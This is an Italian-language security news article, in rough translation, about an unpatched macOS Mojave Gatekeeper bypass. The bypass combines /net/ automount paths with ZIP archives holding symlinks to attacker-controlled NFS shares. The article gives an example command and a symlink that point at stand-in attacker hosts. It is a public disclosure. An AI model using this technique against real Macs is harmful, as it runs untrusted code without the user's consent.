Una vulnerabilità senza patch in MacOS 10.14.5 anche conosciuto come Mojave è stato recentemente scoperto. La falla potrebbe consentire a un utente malintenzionato di eseguire codice arbitrario, senza la necessità di interazione con l'utente, bypassando così gatekeeper.
Questa scoperta viene da ricercatore Filippo Cavallarin dal Segmento, una società di sicurezza informatica con sede in Italia. "Sulla versione MacOS X <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,”Il ricercatore ha scritto.
Come è il bypass Gatekeeper possibile?
Primo, va notato che è nel disegno di Gatekeeper per accettare entrambe le unità esterne e condivisioni di rete come luogo sicuro, consentendo applicazioni che essi contengono per funzionare senza problemi. Tuttavia, mettendo insieme due caratteristiche legittimi di MacOS, è possibile ingannare il Gatekeeper e il suo “comportamento previsto".
Così, quali sono queste caratteristiche? Il primo consente all'utente di montare automaticamente una condivisione di rete, semplicemente accettando un percorso che inizia con “/ net /”:
Per esempio
ls /net/evil-attacker.com/sharedfolder/
renderà il sistema operativo leggere il contenuto del ‘sharedfolder’ sull'host remoto (evil-attacker.com) utilizzando NFS.
L'altra caratteristica è di circa archivi ZIP contenenti link simbolici che puntano a posizioni arbitrarie. Inoltre, il software che decomprime i file zip su MacOS non esegue controlli sui collegamenti simbolici prima di creare loro, il ricercatore spiegato.
Come sarebbe un'opera attacco? Un utente malintenzionato potrebbe creare un file zip con un link simbolico a un endpoint automount hacker controllato (ex Documenti -> /net/evil.com/Documents) e potrebbe inviarlo a un sistema mirato. L'utente dovrebbe scaricare l'archivio dannoso, e avrebbe estratto il file dannoso senza sospettare nulla.
Ora la vittima si trova in una posizione controllato dall'utente malintenzionato, ma di fiducia da Gatekeeper, in modo che qualsiasi eseguibile attaccante controllato può essere eseguito senza alcun preavviso. Il Finder modo è stato progettato (estensioni ex nascondere .app, invisibile percorso dalla barra del titolo) rende questa tecnica molto efficace e difficile da individuare, il ricercatore ha osservato.
C'è anche un video dimostrativo di come funziona questo bypass Gatekeeper.
Questo non è il primo caso di MacOS costruire-in di protezione a.k.a. Gatekeeper essere bypassato. Nel febbraio di quest'anno, ricercatori di sicurezza di Trend Micro hanno scoperto che un file .exe di Windows dannoso potrebbe infettare i computer Mac, e potrebbe scaricare il malware Infostealer accompagnato da adware sui loro sistemi.
In quel caso, i file .exe sono stati in grado di eludere la protezione di Gatekeeper, perché non sono stati controllati dal software, progettato per controllare solo i file nativi di Mac. Questo potrebbe portare a bypassando il controllo della firma del codice e la verifica.
Milena Dimitrova
Uno scrittore ispirato e un gestore di contenuti che è stato con SensorsTechForum dall'inizio del progetto. Un professionista con 10+ anni di esperienza nella creazione di contenuti accattivanti. Incentrato sulla privacy degli utenti e lo sviluppo di malware, crede fortemente in un mondo in cui la sicurezza informatica gioca un ruolo centrale. Se il buon senso non ha senso, lei sarà lì per prendere appunti. Quelle note possono poi trasformarsi in articoli! Seguire Milena @Milenyim
Seguimi: